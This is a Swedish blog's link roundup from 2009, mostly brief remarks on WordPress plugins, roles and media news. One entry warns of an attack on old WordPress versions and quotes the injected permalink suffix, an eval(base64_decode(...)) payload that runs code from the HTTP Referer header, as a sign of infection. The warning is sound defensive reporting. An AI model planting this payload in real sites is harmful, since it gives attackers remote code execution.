Jonas tipsar – 2009-09-05

WordPress under attack

Äldre versioner av WordPress är sårbara för en attack som cirkulerar just nu. Om du hittar extra adminkonton på din WordPress-installation, eller om dina permalänksinställningar (Inställningar -> Permalänkar) plötsligt fått det underliga suffixet /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/ då har du blivit attackerad och ”smittad”.

Uppdatera nu, även om du inte blivit attackerad! Ja, det är så allvarligt. Om du redan blivit angripen, läs Lorelles instruktioner om hur du återställer din WordPress-miljö

Jonas tipsar – 2009-09-03

  • Mindpark: Självbedrägelsernas tio-i-topp
  • Obligatorisk läsning.

  • Justin Tadlock: Users, roles, and capabilities in WordPress
  • WordPress har ett ganska rudimentärt system för roller och rättigheter, Det är framförallt ganska svårt att skräddarsy rättigheterna som man vill. Det finns ett gammalt plugin som heter "Role Manager" som många använt för att sätta rättigheter efter just deras behov, oerhört smidigt. Tyvärr verkar inte den pluginen utvecklas mer och vi har haft dåliga erfarenheter av den i vårt system. Det är därför kul att höra att det är en ny lösning på gång, "Edit Roles" av Justin Tadlock. Tyvärr är den inte färdig än och tyvärr är detta också en plugin, det borde förstås ligga i wordpress core. Medan ni väntar på releasen, så rekommenderar jag att läsa Justins artikel om hur roller och rättigheter fungerar i wordpress.

  • Weblog Tools Collection: ¿Habla HTML?
  • Tvinga wordpress att använda HTML istället för XHTML. Låter som en ganska korkad och ineffektiv lösning imo.

  • Jonas Lejon: Domänvärdering
  • mymlan. the real.: ny krönikör i aftonbladet
  • Karin Magnusson och Mymlan nya krönikörer i Aftonbladet.

  • Thord Daniel Hedengren: Expressen ska kränga tidningar med NE
  • Jag håller med tdh, tryckt uppslagsverk år 2009??

  • mymlan. the real.: nu kan din blogg se ut som daßlog papier
  • Starkt, och snabbt, jobbat av jonk. Jag skulle kunna tänka mig att göra ett wp-tema av omslaget till Heartattack and Vine av Tom Waits.

  • Might Know Something Else: Di.se Drupal CMS projektet havererar
  • Problems in paradise. Drupal (och wordpress) har faktiskt en del problem när det gäller releasehantering och uppdateringar, det går givetvis att lösa, men det kräver en del arbete.

Jonas tipsar – 2009-09-01

Jonas tipsar – 2009-08-31

Jonas tipsar – 2009-08-30

Jonas tipsar – 2009-08-28

Jonas tipsar – 2009-08-27